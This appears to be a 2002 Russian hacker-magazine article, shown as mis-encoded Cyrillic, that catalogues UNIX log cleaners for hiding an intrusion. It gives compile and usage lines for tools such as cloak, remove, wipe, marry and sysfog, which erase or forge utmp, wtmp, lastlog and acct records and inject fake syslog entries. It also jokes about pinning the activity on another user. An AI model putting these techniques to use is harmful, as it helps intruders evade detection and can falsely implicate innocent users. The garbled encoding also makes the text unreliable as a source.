Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Âçëîì<br />
LOG CLEANERS ÄËß UNIX<br />
Stalsen (stalsen@mail.ru) http://stalsen.dtn.ru<br />
<br />
Log cleaners äëÿ UNIX<br />
Êàê íå îñòàâèòü ñëåäû íà<br />
âçëîìàííîé òà÷êå<br />
Ñèñòåìû ëîãîâ â UNIX’å ïîÿâèëèñü ñ ñàìîãî ðîæäåíèÿ. Íóæíà áûëà ñèñòåìà,<br />
êîòîðàÿ áû îïîâåùàëà àäìèíèñòðàòîðà î ïðîøåäøèõ ñîáûòèÿõ.<br />
 òîì ÷èñëå è î ñîáûòèÿõ, ñâÿçàííûõ ñ áåçîïàñíîñòüþ :).<br />
Èòàê, òà÷êà âçëîìàíà, áýêäîðû/rootkit’û óñòàíîâëåíû,<br />
ïîðà ïðèíèìàòüñÿ çà òðåòèé øàã<br />
âçëîìà - î÷èñòêó ëîãîâ. Íà ìîé âçãëÿä, ýòî ñàìûé<br />
îòâåòñòâåííûé ïðîöåññ, òàê êàê íà êîíó<br />
òâîÿ çàäíèöà aka ñâîáîäà. Ïîýòîìó ñåé÷àñ ìû<br />
ñ òîáîé çàéìåìñÿ âûáîðîì ïîäõîäÿùåãî ëîã<br />
êëèíåðà...<br />
utmp.c and logwedit.c<br />
Êîìàíäà who â *íèêñàõ ïîçâîëÿåò óçíàòü, êòî<br />
â äàííûé ìîìåíò íàõîäèòñÿ â ñèñòåìå, è èíôà<br />
ýòà áåðåòñÿ íå îòêóäà-íèáóäü, à èç utmp.<br />
Íàøè äâå çàìå÷àòåëüíûå ïðîãè óäàëÿþò çàïèñè<br />
utmp. Êîìïèëÿöèÿ ñòàíäàðòíàÿ.<br />
Usage: utmp or .<br />
stealth.c<br />
Ïðÿ÷åò òåáÿ îò who/rwho, finger. Íî ïîñëåäíèå<br />
äâå ñëóæáû ðåäêî ãäå ðàáîòàþò, à åñëè<br />
ðàáîòàþò, òî ÿ áû ïîñòàâèë ïîä ñîìíåíèå<br />
êâàëèôèêàöèþ àäìèíà :).<br />
mme.c<br />
Ýòî ïðîãà ìîäèôèò utmp, íî íå òàê, êàê òû<br />
äóìàåøü. MakeME ïîçâîëÿåò ïîäñòàâëÿòü<br />
çàïèñè ñ äðóãîãî ëîãèíà âìåñòî îðèãèíàëüíûõ.<br />
Òåïåðü òû ìîæåøü çàíèìàòüñÿ õàêîì, à<br />
òâîé ñîñåä ñóäåáíûìè ðàçáèðàòåëüñòâàìè<br />
:). Êîìïèëÿöèÿ ñòàíäàðòíà.<br />
Usage: mme èëè mme <br />
.<br />
lastlog.c<br />
Ýòà ïðîãà ìîäèôèò lastlog äëÿ òàêèõ ñèñòåì,<br />
êàê Ultrix è SunOS, ÷òî â íàøå âðåìÿ ÿâëÿåòñÿ<br />
ïî÷òè ýêçîòèêîé, íî, ìîæåò, êîìó-íèáóäü<br />
ïðèãîäèòñÿ...<br />
invisible.c<br />
Ìîäèôèò lastlog, utmp, wtmp. Òî åñòü òàêèå<br />
êîìàíäû, êàê lastlog, who, last. Ïðîãà âîîáùå<br />
áåç îïöèé. Êîìïèëÿöèÿ ñòàíäàðòíà.<br />
cloak.c<br />
< Folder2><br />
Ïðîãà, íàïèñàííàÿ Michael S. Baldwin. Çà÷èùàåò<br />
ôàéëû utmp, wtmp, lastlog, acct (ïóòè ê<br />
íèì ìîæíî çàìåíèòü, êàê è âî âñåõ ïðåäñòàâëåííûõ<br />
ïðîãðàììàõ). Êîìïèëÿöèÿ ñòàíäàðòíàÿ<br />
(gcc cloak.c èëè gcc cloak.c -o<br />
cloak).<br />
Usage: cloak <br />
-l - login time<br />
-u - username<br />
-h - host<br />
-p - programm<br />
remove.c<br />
Êàê óòâåðæäàåò àâòîð - ýòî óíèâåðñàëüíûé<br />
÷èñòèëüùèê utmp/wtmp/lastlog. Òàê è åñòü :).<br />
Êîìïèëÿöèÿ:<br />
gcc -o remove remove.c -DGENERIC<br />
Usage: remove .<br />
-> # - óäàëèòü ïîñëåäíèå çàïèñè èç<br />
utmp/wtmp<br />
a - óäàëèòü âñå çàïèñè èç utmp/wtmp<br />
q - âûõîä<br />
Òàêæå àâòîìàòè÷åñêè ìîäèôèòñÿ lastlog.<br />
sysfog.c<br />
Ïðîãà, êîòîðàÿ ïîñûëàåò ïîääåëüíûå çàïèñè<br />
syslog’ó. Êîìïèëÿöèÿ ñòàíäàðòíà.<br />
Usage: sysfog <br />
Âîò êîäû ñîîáùåíèé:<br />
LOG_EMERG 0<br />
LOG_ALERT 1<br />
LOG_CRIT 2<br />
LOG_ERR 3<br />
LOG_WARNING 4<br />
LOG_NOTICE 5<br />
LOG_INFO 6<br />
LOG_DEBUG 7.<br />
Wipe<br />
Wipe - ýòî ñðåäñòâî óäàëåíèÿ çàïèñè<br />
utmp/wtmp, lastlog è acct. Îñîáîå âíèìàíèå<br />
â ýòîé ïðîãå óäåëåíî ðàçíîïëàòôîðìåííîñòè<br />
è ñâåäåíèþ ê ìèíèìóìó íåñîîòâåòñòâèÿ áèáëèîòåê<br />
â ðàçíûõ ñèñòåìàõ è âåðñèÿõ.<br />
Install: make èëè gcc -o wipe<br />
wipe.c<br />
Usage: wipe [u|w|l|a] options<br />
(u - utmp w-wtmp l-lastlog a-acct).<br />
UTMP ðåäàêòèðîâàíèå:<br />
Ñòàðåòü âñå èìåíà þçåðîâ: wipe u <br />
Ñòåðåòü îäíî èìÿ þçåðà íà âûáðàííîé tty:<br />
wipe u <br />
WTMP ðåäàêòèðîâàíèå:<br />
Ñòåðåòü ïîñëåäíèé âõîä þçåðà: wipe w<br />
<br />
Ñòåðåòü ïîñëåäíèé âõîä íà tty: wipe w<br />
<br />
LASTLOG ðåäàêòèðîâàíèå:<br />
Î÷èñòèòü lastlog äëÿ þçåðà: wipe l <br />
Ïåðåçàïèñàòü lastlog íà äðóãîãî þçåðà: wipe<br />
l <br />
Ãäå - ýòî âðåìÿ â ôîðìàòå<br />
[YYMMddhhmm].<br />
marry.c<br />
Ýòî äîñòàòî÷íî ìîùíûé, ïîääåðæèâàþùèé<br />
ìíîæåñòâî îïöèé Log cleaner. Ñòèðàåò çàïèñè<br />
â wtmp/utpm, lastlog, acct/pacct. Êîìïèëÿöèÿ<br />
ñòàíäàðòíà.<br />
Usage: ./marry [-aetsuScDn] [-i src] [-o obj] [-<br />
d dump] [-p pat] [-v pat] [-m [WLA]] [-E editor]<br />
[-h program] [-b backup ]<br />
P.S. Òàêæå õî÷ó ñêàçàòü, ÷òî â êîìïëåêòå ñî ìíîãèìè<br />
rootkit’àìè ïîñòàâëÿþòñÿ è ëîã êëèíåðû.<br />
Íî âñå ýòî áåññèëüíî...<br />
Êàê òû ïîíÿë, ëîã êëèíåðû ñòèðàþò âñÿêèå<br />
wtmp/utmp, lastlog, à èíîãäà è acct/pacct. Íî ÷òî<br />
äåëàòü, åñëè â ñèñòåìå ðàáîòàåò íå ëîõ, à äåéñòâèòåëüíî<br />
õîðîøèé àäìèí ×òî, åñëè ó íåãî<br />
óñòàíîâëåíû äîïîëíèòåëüíûå ëîãåðû, íå âõîäÿùèå<br />
â ñòàíäàðòíóþ ïîñòàâêó UNIX è ïðåäëàãàåìûå<br />
ñòîðîííèìè ðàñïðîñòðàíèòåëÿìè Íàïðèìåð,<br />
SWATCH, Netlog, LogSurfer è ò.ä. Ïîíÿòíîå<br />
äåëî, ÷òî äëÿ âñåõ ýòèõ ïðîã ëîã êëèíåðû íèêòî<br />
ïèñàòü íå áóäåò. À ÷òî, åñëè ëîãè åùå è ïåðåíàïðàâëÿþòñÿ<br />
íà äðóãîé õîñò è àâòîìàòè÷åñêè êîïèðóåòñÿ,<br />
íàïðèìåð, íà ñòðèìåð Ñîãëàñåí,<br />
âîçìîæíî, ÿ ïðåóâåëè÷èâàþ, íî âåäü òàêîå âîçìîæíî!<br />
Äàæå syslog ïîçâîëÿåò ïåðåäàâàòü äàííûå<br />
óäàëåííîìó óçëó (äëÿ ýòîãî âìåñòî èìåíè<br />
ôàéëà, íàïðèìåð, /var/log/wtmp, íóæíî óêàçàòü<br />
*hostname, íó à íà óäàëåííîì êîìïå îòêðûòü<br />
ïîðò syslogd). È ÿ óæå íå ãîâîðþ î òàêèõ ñðåäñòâàõ,<br />
êàê MOM è ïîäîáíûå!<br />
À ÷òî åñëè àäìèí â syslog.conf ïîìåíÿë ìåñòîðàñïîëîæåíèå<br />
utmp/wtmp/lastlog Ïðèäåòñÿ<br />
èçìåíÿòü èñõîäíèêè ëîã êëèíåðà...<br />
Ñîâåòóþ òåáå ïîäóìàòü íàä ýòèìè ðèòîðè÷åñêèìè<br />
âîïðîñàìè :). Âñå çàâèñèò ëèøü îò òâîåé êâàëèôèêàöèè.<br />
Òåì á îëåå, î÷èñòêà ëîãîâ - ýòî íå åäèíñòâåííàÿ<br />
ïðîáëåìà íà âçëîìàííîé ñòàíöèè...<br />
< Âçëîì >20/02\02<br />
5 6 7 8 9<br />
Êîäèíã Hack-Faq JoyStick Þíèòû Quit> 49